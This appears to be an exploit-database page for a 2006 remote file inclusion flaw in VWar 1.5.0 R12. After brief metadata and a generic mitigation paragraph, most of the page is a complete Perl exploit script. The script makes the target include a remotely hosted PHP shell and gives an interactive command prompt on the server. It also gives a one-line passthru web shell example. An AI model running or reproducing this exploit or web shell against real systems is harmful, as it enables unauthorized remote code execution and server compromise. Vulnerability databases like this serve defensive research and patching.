VWar - exploit.company

vendor:

VWar

by:

ExploiterCode.com

9,3

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: VWar

Affected Version From: VWar 1.5.0 R12

Affected Version To: VWar 1.5.0 R12

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2006

VWar <= 1.5.0 R12 Remote File Inclusion Exploit

VWar <= 1.5.0 R12 is vulnerable to a Remote File Inclusion vulnerability which allows an attacker to execute arbitrary code on the vulnerable server. This exploit allows an attacker to execute arbitrary code on the vulnerable server by sending a maliciously crafted HTTP request to the vulnerable server. The maliciously crafted HTTP request contains a URL pointing to a malicious file which is then included and executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the application is not vulnerable to Remote File Inclusion. This can be done by validating user input and ensuring that the application is not vulnerable to malicious input.

Source

Exploit-DB raw data:

#!/usr/bin/perl
##
# VWar <= 1.5.0 R12 Remote File Inclusion Exploit
# Bug Found By uid0 code by zod
## 
# (c) 2006
# ExploiterCode.com
##
# usage:
# perl vwar.pl <location of VWar> <cmd shell location> <cmd shell variable>
#
# perl vwar.pl http://site.com/VWar/ http://site.com/cmd.txt cmd
#
# cmd shell example: <?passthru($_GET[cmd]);?>
#
# cmd shell variable: ($_GET[cmd]);
##
# hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else!
#
# special shout to [ill]will!
##
# Contact: www.exploitercode.com irc.exploitercode.com uid0@exploitercode.com
##
# Comments:
# I release a new exploit because VWar
# Dev. Team called my other exploit XSS!!!
##

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

while()
{
	print "[shell] \$";
while(<STDIN>)
        {
                $cmd=$_;
                chomp($cmd);
         
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'includes/get_header.php?vwar_root='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[ê]/;

if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
	{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

if($return =~ /(.+)<br.\/>.<b>Fatal.error/)


{
	$finreturn = $1;
	$finreturn=~ tr/[ê]/[\n]/;
	print "\r\n$finreturn\n\r";
	last;
}

else {print "[shell] \$";}}}last;

sub head()
 {
 print "\n============================================================================\r\n";
 print " 	   *VWar <= 1.5.0 R12 Remote File Inclusion Exploit*\r\n";   
 print "============================================================================\r\n";
 }
sub usage()
 {
 head();
 print " Usage: perl vwar.pl <location of VWar> <cmd shell location> <cmd shell variable>\r\n\n";
 print " <Site> - Full path to VWar ex: http://www.site.com/VWar/ \r\n";
 print " <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
 print " <cmd variable> - Command variable used in php shell \r\n";
 print "============================================================================\r\n";
 print "		           Bug Found by uid0\r\n";
 print "	www.exploitercode.com irc.exploitercode.com #exploitercode\r\n";
 print "============================================================================\r\n";
 exit();
 }

# milw0rm.com [2006-04-02]